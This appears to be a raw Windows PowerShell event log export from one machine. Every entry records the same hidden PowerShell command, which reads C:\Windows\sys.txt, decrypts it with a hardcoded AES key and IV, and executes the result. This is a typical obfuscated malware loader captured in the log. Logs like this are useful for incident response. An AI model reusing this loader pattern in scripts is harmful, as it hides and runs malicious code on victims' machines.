Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:25
Event ID: 403
Task Category: Engine Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



403
0
4
4
0
0x80000000000000

8004


Windows PowerShell
acko



Stopped
Available
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:25
Event ID: 400
Task Category: Engine Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Engine state is changed from None to Available.

Details:
NewEngineState=Available
PreviousEngineState=None

SequenceNumber=13

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



400
0
4
4
0
0x80000000000000

8003


Windows PowerShell
acko



Available
None
NewEngineState=Available
PreviousEngineState=None

SequenceNumber=13

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=5.1.26100.3613
RunspaceId=a71139b1-9e14-444a-83d8-d36b2d273ffc
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Variable" is Started.

Details:
ProviderName=Variable
NewProviderState=Started

SequenceNumber=11

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



600
0
4
6
0
0x80000000000000

8002


Windows PowerShell
acko



Variable
Started
ProviderName=Variable
NewProviderState=Started

SequenceNumber=11

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Function" is Started.

Details:
ProviderName=Function
NewProviderState=Started

SequenceNumber=9

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



600
0
4
6
0
0x80000000000000

8001


Windows PowerShell
acko



Function
Started
ProviderName=Function
NewProviderState=Started

SequenceNumber=9

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "FileSystem" is Started.

Details:
ProviderName=FileSystem
NewProviderState=Started

SequenceNumber=7

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



600
0
4
6
0
0x80000000000000

8000


Windows PowerShell
acko



FileSystem
Started
ProviderName=FileSystem
NewProviderState=Started

SequenceNumber=7

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Environment" is Started.

Details:
ProviderName=Environment
NewProviderState=Started

SequenceNumber=5

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



600
0
4
6
0
0x80000000000000

7999


Windows PowerShell
acko



Environment
Started
ProviderName=Environment
NewProviderState=Started

SequenceNumber=5

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Alias" is Started.

Details:
ProviderName=Alias
NewProviderState=Started

SequenceNumber=3

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



600
0
4
6
0
0x80000000000000

7998


Windows PowerShell
acko



Alias
Started
ProviderName=Alias
NewProviderState=Started

SequenceNumber=3

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>

Log Name: Windows PowerShell
Source: PowerShell
Date: 20. 3. 2025. 22:07:24
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: acko
Description:
Provider "Registry" is Started.

Details:
ProviderName=Registry
NewProviderState=Started

SequenceNumber=1

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Event Xml:



600
0
4
6
0
0x80000000000000

7997


Windows PowerShell
acko



Registry
Started
ProviderName=Registry
NewProviderState=Started

SequenceNumber=1

HostName=ConsoleHost
HostVersion=5.1.26100.3613
HostId=ceccd76f-eee0-4efd-a853-91b0ffa33012
HostApplication=Powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -NoProfile -Command $e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>